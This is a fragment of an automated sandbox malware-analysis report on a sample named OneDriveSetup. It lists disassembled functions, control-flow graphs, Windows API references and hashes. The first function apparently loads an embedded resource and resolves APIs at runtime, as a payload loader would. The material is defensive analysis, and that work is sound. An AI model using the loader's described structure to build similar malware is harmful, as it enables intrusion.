                                                                                                                                                                        Function 004019F0 Relevance: 146.0, APIs: 34, Strings: 49, Instructions: 747comprocessCOMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 0 4019f0-401ac7 OleInitialize call 401650 call 40b99e 5 40248a-402496 0->5 6 401acd-401c4f GetCurrentProcessId CreateToolhelp32Snapshot Module32First 0->6 7 401dc3-401ed4 CloseHandle GetModuleHandleA call 401650 FindResourceA LoadResource LockResource SizeofResource call 40b84d call 40af66 6->7 8 401c55-401c6c call 401650 6->8 27 401ed6-401eed call 40ba30 7->27 28 401eef 7->28 14 401c73-401c77 8->14 16 401c93-401c95 14->16 17 401c79-401c7b 14->17 21 401c98-401c9a 16->21 19 401c7d-401c83 17->19 20 401c8f-401c91 17->20 19->16 23 401c85-401c8d 19->23 20->21 24 401cb0-401cce call 401650 21->24 25 401c9c-401caf CloseHandle 21->25 23->14 23->20 32 401cd0-401cd4 24->32 31 401ef3-401f1a call 401300 SizeofResource 27->31 28->31 41 401f1c-401f2f 31->41 42 401f5f-401f69 31->42 35 401cf0-401cf2 32->35 36 401cd6-401cd8 32->36 40 401cf5-401cf7 35->40 38 401cda-401ce0 36->38 39 401cec-401cee 36->39 38->35 45 401ce2-401cea 38->45 39->40 40->25 46 401cf9-401d09 Module32Next 40->46 47 401f33-401f5d call 401560 41->47 43 401f73-401f75 42->43 44 401f6b-401f72 42->44 49 401f92-4021a4 call 40ba30 FreeResource call 40b84d SizeofResource call 40ac60 call 40ba30 call 401650 LoadLibraryA call 401650 GetProcAddress 43->49 50 401f77-401f8d call 401560 43->50 44->43 45->32 45->39 46->7 51 401d0f 46->51 47->42 49->5 85 4021aa-4021c0 49->85 50->49 55 401d10-401d2e call 401650 51->55 61 401d30-401d34 55->61 63 401d50-401d52 61->63 64 401d36-401d38 61->64 67 401d55-401d57 63->67 65 401d3a-401d40 64->65 66 401d4c-401d4e 64->66 65->63 69 401d42-401d4a 65->69 66->67 67->25 70 401d5d-401d7b call 401650 67->70 69->61 69->66 77 401d80-401d84 70->77 79 401da0-401da2 77->79 80 401d86-401d88 77->80 84 401da5-401da7 79->84 82 401d8a-401d90 80->82 83 401d9c-401d9e 80->83 82->79 86 401d92-401d9a 82->86 83->84 84->25 87 401dad-401dbd Module32Next 84->87 89 4021c6-4021ca 85->89 90 40246a-402470 85->90 86->77 86->83 87->7 87->55 89->90 91 4021d0-402217 call 4018f0 89->91 92 402472-402475 90->92 93 40247a-402480 90->93 98 40221d-40223d 91->98 99 40244f-40245f 91->99 92->93 93->5 95 402482-402487 93->95 95->5 98->99 103 402243-402251 98->103 99->90 100 402461-402467 call 40b6b5 99->100 100->90 103->99 106 402257-4022b7 call 401870 VariantInit call 401870 VariantInit call 4018d0 103->106 114 4022c3-40232a call 4018d0 SafeArrayCreate SafeArrayAccessData call 40b350 SafeArrayUnaccessData 106->114 115 4022b9-4022be call 40ad90 106->115 122 402336-40234d call 4018d0 114->122 123 40232c-402331 call 40ad90 114->123 115->114 152 40234e call 847d006 122->152 153 40234e call 847d01d 122->153 123->122 127 402350-402352 128 402354-402355 SafeArrayDestroy 127->128 129 40235b-402361 127->129 128->129 130 402363-402368 call 40ad90 129->130 131 40236d-402375 129->131 130->131 132 402377-402379 131->132 133 40237b 131->133 135 40237d-40238f call 4018d0 132->135 133->135 154 402390 call 847d006 135->154 155 402390 call 847d01d 135->155 138 402392-4023a2 SafeArrayCreateVector 139 4023a4-4023a9 call 40ad90 138->139 140 4023ae-4023b4 138->140 139->140 142 4023b6-4023b8 140->142 143 4023ba 140->143 144 4023bc-402417 VariantClear * 2 call 4019a0 142->144 143->144 146 40241c-40242c VariantClear 144->146 147 402436-402445 call 4019a0 146->147 148 40242e-402433 146->148 147->99 151 402447-40244c 147->151 148->147 151->99 152->127 153->127 154->138 155->138
                                                                                                                                                                        APIs
                                                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 004019FD
                                                                                                                                                                        • _getenv.LIBCMT ref: 00401ABA
                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00401ACD
                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401AD6
                                                                                                                                                                        • Module32First.KERNEL32 ref: 00401C48
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,00000008,00000000), ref: 00401C9D
                                                                                                                                                                        • Module32Next.KERNEL32(00000000,?), ref: 00401D02
                                                                                                                                                                        • Module32Next.KERNEL32(00000000,?), ref: 00401DB6
                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00401DC4
                                                                                                                                                                        • GetModuleHandleA.KERNEL32(00000000), ref: 00401DCB
                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,00000000,00000008), ref: 00401E90
                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000), ref: 00401E9E
                                                                                                                                                                        • LockResource.KERNEL32(00000000), ref: 00401EA7
                                                                                                                                                                        • SizeofResource.KERNEL32(00000000,00000000), ref: 00401EB3
                                                                                                                                                                        • _malloc.LIBCMT ref: 00401EBA
                                                                                                                                                                        • _memset.LIBCMT ref: 00401EDD
                                                                                                                                                                        • SizeofResource.KERNEL32(00000000,?), ref: 00401F02
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2693722953.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        • Associated: 00000006.00000002.2693722953.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_400000_OneDriveSetup.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Resource$HandleModule32$CloseNextSizeof$CreateCurrentFindFirstInitializeLoadLockModuleProcessSnapshotToolhelp32_getenv_malloc_memset
                                                                                                                                                                        • String ID: !$!$!$"$%$'$'$)$*$*$.$.$0$4$4$4$5$6$8$:$D$E$U$V$V$W$W$W$W$[$[$_._$___$h$o$o$o$v$v$v$v$x$x$x$x${${${${
                                                                                                                                                                        • API String ID: 1430744539-2962942730
                                                                                                                                                                        • Opcode ID: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
                                                                                                                                                                        • Instruction ID: 7b7814addfdf4b3cbdaef5ede101091f5fb3e94df766619d88950efa0d528cfd
                                                                                                                                                                        • Opcode Fuzzy Hash: 5b8530bddefb045e1b9ab2db406c8ab4da3f0b02880ef73395902e6a9a04ea37
                                                                                                                                                                        • Instruction Fuzzy Hash: B3628C2100C7C19EC321DB388888A5FBFE55FA6328F484A5DF1E55B2E2C7799509C76B
                                                                                                                                                                        Function 0C415048 Relevance: 4.3, Strings: 1, Instructions: 3071COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: N
                                                                                                                                                                        • API String ID: 0-1130791706
                                                                                                                                                                        • Opcode ID: 90e4bc500f5b050298e83bb626056485f381faf69a8dffd0612861b534befc43
                                                                                                                                                                        • Instruction ID: d492b065273b1258a837d34671bb63c46ed63db9af1937489320da1705682e70
                                                                                                                                                                        • Opcode Fuzzy Hash: 90e4bc500f5b050298e83bb626056485f381faf69a8dffd0612861b534befc43
                                                                                                                                                                        • Instruction Fuzzy Hash: 2873D431D1075A8EDB21EF68C854AD9F7B1FF99300F11D69AE44867261EB70AAC4CF81
                                                                                                                                                                        Function 0C419C48 Relevance: 3.5, Strings: 1, Instructions: 2262COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: K
                                                                                                                                                                        • API String ID: 0-856455061
                                                                                                                                                                        • Opcode ID: 83280479ff66089c5a462806252e7f7ea7e0ef3d7778b564f9fe5073e953280e
                                                                                                                                                                        • Instruction ID: a7730007ed47ff768cd92045fcf53fbd5546bf0dfae477d4c093bedd54f58c83
                                                                                                                                                                        • Opcode Fuzzy Hash: 83280479ff66089c5a462806252e7f7ea7e0ef3d7778b564f9fe5073e953280e
                                                                                                                                                                        • Instruction Fuzzy Hash: 9733D370D147198ADB21EF68C894A9DF7B1FF99300F11C69AE44C67261EB70AAC5CF81
                                                                                                                                                                        Function 0C419578 Relevance: 1.9, APIs: 1, Instructions: 359COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1175 c419578-c4195a7 1176 c4195a9 1175->1176 1177 c4195ae-c419647 1175->1177 1176->1177 1180 c4196e6-c4196ec 1177->1180 1181 c4196f2-c41970a 1180->1181 1182 c41964c-c41965f 1180->1182 1183 c41970c-c419719 1181->1183 1184 c41971e-c419731 1181->1184 1185 c419661 1182->1185 1186 c419666-c4196b7 1182->1186 1189 c419ab4-c419bb1 1183->1189 1187 c419733 1184->1187 1188 c419738-c419754 1184->1188 1185->1186 1202 c4196b9-c4196c7 1186->1202 1203 c4196ca-c4196dc 1186->1203 1187->1188 1191 c419756 1188->1191 1192 c41975b-c41977f 1188->1192 1194 c419bb3-c419bb8 1189->1194 1195 c419bb9-c419bc3 1189->1195 1191->1192 1198 c419781 1192->1198 1199 c419786-c4197b8 1192->1199 1194->1195 1198->1199 1208 c4197ba 1199->1208 1209 c4197bf-c419801 1199->1209 1202->1181 1205 c4196e3 1203->1205 1206 c4196de 1203->1206 1205->1180 1206->1205 1208->1209 1211 c419803 1209->1211 1212 c419808-c419811 1209->1212 1211->1212 1213 c419a39-c419a3f 1212->1213 1214 c419a45-c419a58 1213->1214 1215 c419816-c41983b 1213->1215 1218 c419a5a 1214->1218 1219 c419a5f-c419a7a 1214->1219 1216 c419842-c419879 1215->1216 1217 c41983d 1215->1217 1227 c419880-c4198b2 1216->1227 1228 c41987b 1216->1228 1217->1216 1218->1219 1220 c419a81-c419a95 1219->1220 1221 c419a7c 1219->1221 1224 c419a97 1220->1224 1225 c419a9c-c419ab2 LdrInitializeThunk 1220->1225 1221->1220 1224->1225 1225->1189 1230 c4198b4-c4198d9 1227->1230 1231 c419916-c419929 1227->1231 1228->1227 1232 c4198e0-c41990e 1230->1232 1233 c4198db 1230->1233 1234 c419930-c419955 1231->1234 1235 c41992b 1231->1235 1232->1231 1233->1232 1238 c419964-c41999c 1234->1238 1239 c419957-c419958 1234->1239 1235->1234 1240 c4199a3-c419a04 call c419358 1238->1240 1241 c41999e 1238->1241 1239->1214 1247 c419a06 1240->1247 1248 c419a0b-c419a2f 1240->1248 1241->1240 1247->1248 1251 c419a31 1248->1251 1252 c419a36 1248->1252 1251->1252 1252->1213
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 4f2b82a501cd5ecb75da397ec0aef5c047e613a1370c9e3a61e626a03dc7f43a
                                                                                                                                                                        • Instruction ID: 685d3968b4c9f65d76c69f60d32047464679ed2e617d4a51147d9325cd0b85a5
                                                                                                                                                                        • Opcode Fuzzy Hash: 4f2b82a501cd5ecb75da397ec0aef5c047e613a1370c9e3a61e626a03dc7f43a
                                                                                                                                                                        • Instruction Fuzzy Hash: B6F1E674E01218CFDB14DFA9C994B9DBBB2FF88304F5481AAD848AB355DB319986CF50
                                                                                                                                                                        Function 0851D7B8 Relevance: 1.5, Strings: 1, Instructions: 203COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 1611 851d7b8-851d7bc 1612 851d783-851d79b 1611->1612 1613 851d7be-851d7c5 1611->1613 1614 851d7cb-851d7e8 1612->1614 1615 851d79d-851d7a9 1612->1615 1613->1614 1617 851d7ea 1614->1617 1618 851d7ef-851d8cf call 85146a8 call 85141c8 1614->1618 1617->1618 1629 851d8d1 1618->1629 1630 851d8d6-851d8f7 call 8515b68 1618->1630 1629->1630 1632 851d8fc-851d907 1630->1632 1633 851d909 1632->1633 1634 851d90e-851d912 1632->1634 1633->1634 1635 851d914-851d915 1634->1635 1636 851d917-851d91e 1634->1636 1637 851d936-851d97a 1635->1637 1638 851d920 1636->1638 1639 851d925-851d933 1636->1639 1643 851d9e0-851d9f7 1637->1643 1638->1639 1639->1637 1645 851d9f9-851da1e 1643->1645 1646 851d97c-851d992 1643->1646 1652 851da20-851da35 1645->1652 1653 851da36 1645->1653 1650 851d994-851d9a0 1646->1650 1651 851d9bc 1646->1651 1654 851d9a2-851d9a8 1650->1654 1655 851d9aa-851d9b0 1650->1655 1656 851d9c2-851d9df 1651->1656 1652->1653 1657 851d9ba 1654->1657 1655->1657 1656->1643 1657->1656
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID: W
                                                                                                                                                                        • API String ID: 0-655174618
                                                                                                                                                                        • Opcode ID: 6d898e6ed9ee1e7f7c86e54fb0e4e53a7c7e71f897312114a0edfa1ff42b6917
                                                                                                                                                                        • Instruction ID: 43a9afd99063192fc53515938ab76bdbe7e447ec37f103c4362c46006b115aa9
                                                                                                                                                                        • Opcode Fuzzy Hash: 6d898e6ed9ee1e7f7c86e54fb0e4e53a7c7e71f897312114a0edfa1ff42b6917
                                                                                                                                                                        • Instruction Fuzzy Hash: 6591B374E00218CFEF54DFA9D984A9DBBF2BF89301F148069D819AB365DB305946CF51
                                                                                                                                                                        Function 08512EF8 Relevance: 1.0, Instructions: 974COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 0d7e54d6200c11649726497aa04852ef92b2f479774e02a5e7743ba0c17315ef
                                                                                                                                                                        • Instruction ID: 26bd24e3f8cb2618536265c0df73b8ed6ee37044a8efdd1d4a685d0f33ad1c1f
                                                                                                                                                                        • Opcode Fuzzy Hash: 0d7e54d6200c11649726497aa04852ef92b2f479774e02a5e7743ba0c17315ef
                                                                                                                                                                        • Instruction Fuzzy Hash: EC62D56406F3D9BADF5AC778C8D4997BF5A6F82328B1843EDD4845E217C262C846C363
                                                                                                                                                                        Function 0851A598 Relevance: .9, Instructions: 892COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 35480258675c058dcaaf4131678c36b56a81dabef5b62959204a35cbac01b327
                                                                                                                                                                        • Instruction ID: a388bacafe47e98b8efad567af44874739f4e46735e84de55a045e2c937b30a6
                                                                                                                                                                        • Opcode Fuzzy Hash: 35480258675c058dcaaf4131678c36b56a81dabef5b62959204a35cbac01b327
                                                                                                                                                                        • Instruction Fuzzy Hash: 75827D74A01219DFDF16CF68C584AAEBBB2FF88311F158559E805DB3A1D730E981CB91
                                                                                                                                                                        Function 0C410B30 Relevance: .7, Instructions: 711COMMON
                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                        • Executed
                                                                                                                                                                        • Not Executed
                                                                                                                                                                        control_flow_graph 2246 c410b30-c410b50 2247 c410b52 2246->2247 2248 c410b57-c410bdb 2246->2248 2247->2248 2251 c410c40-c410c56 2248->2251 2252 c410c58-c410ca2 2251->2252 2253 c410bdd-c410be6 2251->2253 2260 c410ca4-c410ce5 2252->2260 2261 c410d0d-c410d0e 2252->2261 2254 c410be8 2253->2254 2255 c410bed-c410c36 2253->2255 2254->2255 2262 c410c38 2255->2262 2263 c410c3d 2255->2263 2268 c410d07-c410d08 2260->2268 2269 c410ce7-c410d05 2260->2269 2264 c410d0f-c410d40 2261->2264 2262->2263 2263->2251 2270 c410d47-c410dae 2264->2270 2271 c410d09-c410d0b 2268->2271 2269->2271 2276 c411700-c411735 2270->2276 2277 c410db4-c410dd5 2270->2277 2271->2264 2280 c4116dd-c4116f9 2277->2280 2281 c410dda-c410de3 2280->2281 2282 c4116ff 2280->2282 2283 c410de5 2281->2283 2284 c410dea-c410e50 2281->2284 2282->2276 2283->2284 2288 c410e52 2284->2288 2289 c410e57-c410ee1 2284->2289 2288->2289 2295 c410ef3-c410efa 2289->2295 2296 c410ee3-c410eea 2289->2296 2297 c410f01-c410f0e 2295->2297 2298 c410efc 2295->2298 2299 c410ef1 2296->2299 2300 c410eec 2296->2300 2301 c410f10 2297->2301 2302 c410f15-c410f1c 2297->2302 2298->2297 2299->2297 2300->2299 2301->2302 2303 c410f23-c410f7a 2302->2303 2304 c410f1e 2302->2304 2307 c410f81-c410f98 2303->2307 2308 c410f7c 2303->2308 2304->2303 2309 c410fa3-c410fab 2307->2309 2310 c410f9a-c410fa1 2307->2310 2308->2307 2311 c410fac-c410fb6 2309->2311 2310->2311 2312 c410fb8 2311->2312 2313 c410fbd-c410fc6 2311->2313 2312->2313 2314 c4116ad-c4116b3 2313->2314 2315 c4116b9-c4116d3 2314->2315 2316 c410fcb-c410fd7 2314->2316 2322 c4116d5 2315->2322 2323 c4116da 2315->2323 2317 c410fd9 2316->2317 2318 c410fde-c410fe3 2316->2318 2317->2318 2319 c410fe5-c410ff1 2318->2319 2320 c411026-c411028 2318->2320 2325 c410ff3 2319->2325 2326 c410ff8-c410ffd 2319->2326 2324 c41102e-c411042 2320->2324 2322->2323 2323->2280 2328 c411048-c41105d 2324->2328 2329 c41168b-c411698 2324->2329 2325->2326 2326->2320 2327 c410fff-c41100c 2326->2327 2330 c411013-c411024 2327->2330 2331 c41100e 2327->2331 2332 c411064-c4110ea 2328->2332 2333 c41105f 2328->2333 2334 c411699-c4116a3 2329->2334 2330->2324 2331->2330 2341 c411114 2332->2341 2342 c4110ec-c411112 2332->2342 2333->2332 2335 c4116a5 2334->2335 2336 c4116aa 2334->2336 2335->2336 2336->2314 2343 c41111e-c41113e 2341->2343 2342->2343 2345 c411144-c41114e 2343->2345 2346 c4112bd-c4112c2 2343->2346 2347 c411150 2345->2347 2348 c411155-c41117e 2345->2348 2349 c4112c4-c4112e4 2346->2349 2350 c411326-c411328 2346->2350 2347->2348 2352 c411180-c41118a 2348->2352 2353 c411198-c41119a 2348->2353 2363 c4112e6-c41130c 2349->2363 2364 c41130e 2349->2364 2351 c41132e-c41134e 2350->2351 2355 c411685-c411686 2351->2355 2356 c411354-c41135e 2351->2356 2358 c411191-c411197 2352->2358 2359 c41118c 2352->2359 2354 c411239-c411248 2353->2354 2365 c41124a 2354->2365 2366 c41124f-c411254 2354->2366 2362 c411687-c411689 2355->2362 2360 c411360 2356->2360 2361 c411365-c41138e 2356->2361 2358->2353 2359->2358 2360->2361 2370 c411390-c41139a 2361->2370 2371 c4113a8-c4113b6 2361->2371 2362->2334 2367 c411318-c411324 2363->2367 2364->2367 2365->2366 2368 c411256-c411266 2366->2368 2369 c41127e-c411280 2366->2369 2367->2351 2372 c411268 2368->2372 2373 c41126d-c41127c 2368->2373 2374 c411286-c41129a 2369->2374 2375 c4113a1-c4113a7 2370->2375 2376 c41139c 2370->2376 2377 c411455-c411464 2371->2377 2372->2373 2373->2374 2379 c4112a0-c4112b8 2374->2379 2380 c41119f-c4111ba 2374->2380 2375->2371 2376->2375 2381 c411466 2377->2381 2382 c41146b-c411470 2377->2382 2379->2362 2383 c4111c1-c41122b 2380->2383 2384 c4111bc 2380->2384 2381->2382 2385 c411472-c411482 2382->2385 2386 c41149a-c41149c 2382->2386 2403 c411232-c411238 2383->2403 2404 c41122d 2383->2404 2384->2383 2388 c411484 2385->2388 2389 c411489-c411498 2385->2389 2387 c4114a2-c4114b6 2386->2387 2390 c4113bb-c4113d6 2387->2390 2391 c4114bc-c411525 2387->2391 2388->2389 2389->2387 2393 c4113d8 2390->2393 2394 c4113dd-c411447 2390->2394 2401 c411527-c411529 2391->2401 2402 c41152e-c411681 2391->2402 2393->2394 2408 c411449 2394->2408 2409 c41144e-c411454 2394->2409 2405 c411682-c411683 2401->2405 2402->2405 2403->2354 2404->2403 2405->2315 2408->2409 2409->2377
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: ed278707fe94f524ee1241e8df388bb50a3ce7a7901639f192eaa74776862aac
                                                                                                                                                                        • Instruction ID: d1d0843acb167a2216bc92699c227dad9c765070928a7f3da8d503481fdcc305
                                                                                                                                                                        • Opcode Fuzzy Hash: ed278707fe94f524ee1241e8df388bb50a3ce7a7901639f192eaa74776862aac
                                                                                                                                                                        • Instruction Fuzzy Hash: 4172BC74E012688FDB64DF69C980BDDBBB2BB49300F5481EAD949A7351DB309E81CF41
                                                                                                                                                                        Function 08516EA8 Relevance: .5, Instructions: 519COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 571f34853749c75d7c54aa95e4051b2dd78229e18e66cb0d2cd5f1bb7ef725cd
                                                                                                                                                                        • Instruction ID: 1a3510f48bd1c1a8c54400011b84957b3fc93406eead215cbddf4aafe11f250b
                                                                                                                                                                        • Opcode Fuzzy Hash: 571f34853749c75d7c54aa95e4051b2dd78229e18e66cb0d2cd5f1bb7ef725cd
                                                                                                                                                                        • Instruction Fuzzy Hash: 8F125C74A002199FEF14DFA9C894AAEBBF6FF88301F148569E405DB395DB349942CB90
                                                                                                                                                                        Function 085174E0 Relevance: .5, Instructions: 514COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 7a99f3fb762d7c2479c6440f30913e27d687c981caa636735cabb20a97a5b5cc
                                                                                                                                                                        • Instruction ID: 45cd466da54f24dd289183e7469df05f26ad4f28dd54e9dc2f251e118e5d647c
                                                                                                                                                                        • Opcode Fuzzy Hash: 7a99f3fb762d7c2479c6440f30913e27d687c981caa636735cabb20a97a5b5cc
                                                                                                                                                                        • Instruction Fuzzy Hash: 17223B30A00219DFEF14DF6DD884AADBBF2FF88312F1584AAE415AB265DB31D945CB50
                                                                                                                                                                        Function 08514311 Relevance: .4, Instructions: 439COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 0ef479c5968e3f8f7ee56b14f78eddd49118913e5f9d8eb7d3b46201d7329cf8
                                                                                                                                                                        • Instruction ID: dad22f3b03964ea7bf61ddbd023d01f87967c0362e7103a613a05f02d24d8ed3
                                                                                                                                                                        • Opcode Fuzzy Hash: 0ef479c5968e3f8f7ee56b14f78eddd49118913e5f9d8eb7d3b46201d7329cf8
                                                                                                                                                                        • Instruction Fuzzy Hash: B8F1A974A052489FEF18DFB5D4945AEBBB2FF89301B15846DE406EB384DF359802CB51
                                                                                                                                                                        Function 0851C4E0 Relevance: .4, Instructions: 352COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2694758605.0000000008510000.00000040.00000800.00020000.00000000.sdmp, Offset: 08510000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_8510000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: 2fac49fced2e00eac9f47a6a99e9ce1ff0b7b4530f8711fba0d5e5857a79beb6
                                                                                                                                                                        • Instruction ID: 5f84ae63e1c8d74ddceac289d5702c36266aaa06cc9554dd0da28f9235cb495e
                                                                                                                                                                        • Opcode Fuzzy Hash: 2fac49fced2e00eac9f47a6a99e9ce1ff0b7b4530f8711fba0d5e5857a79beb6
                                                                                                                                                                        • Instruction Fuzzy Hash: 83E1E875E40218DFEF14CFA9C984A9DBBB1BF88311F5590A9E819AB361DB31AC41CF50
                                                                                                                                                                        Function 0C41D9D8 Relevance: .3, Instructions: 270COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID:
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID:
                                                                                                                                                                        • Opcode ID: b8aafa79a8feeacfcd14e6e8baae07bc367ade4301082991e0b423cd2c47e3c7
                                                                                                                                                                        • Instruction ID: e32f6869f0d36f9b82d42b1c52d53de40bc55b68ae07fbc5c050e0f86a968c28
                                                                                                                                                                        • Opcode Fuzzy Hash: b8aafa79a8feeacfcd14e6e8baae07bc367ade4301082991e0b423cd2c47e3c7
                                                                                                                                                                        • Instruction Fuzzy Hash: F6C1B174E01218CFDB14DFA5C984B9DBBB2BF89300F6081AAD809AB354DB359E85CF51
                                                                                                                                                                        Function 0C412580 Relevance: .3, Instructions: 270COMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000006.00000002.2699556389.000000000C410000.00000040.00000800.00020000.00000000.sdmp, Offset: 0C410000, based on PE: false
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_6_2_c410000_OneDriveSetup.jbxd
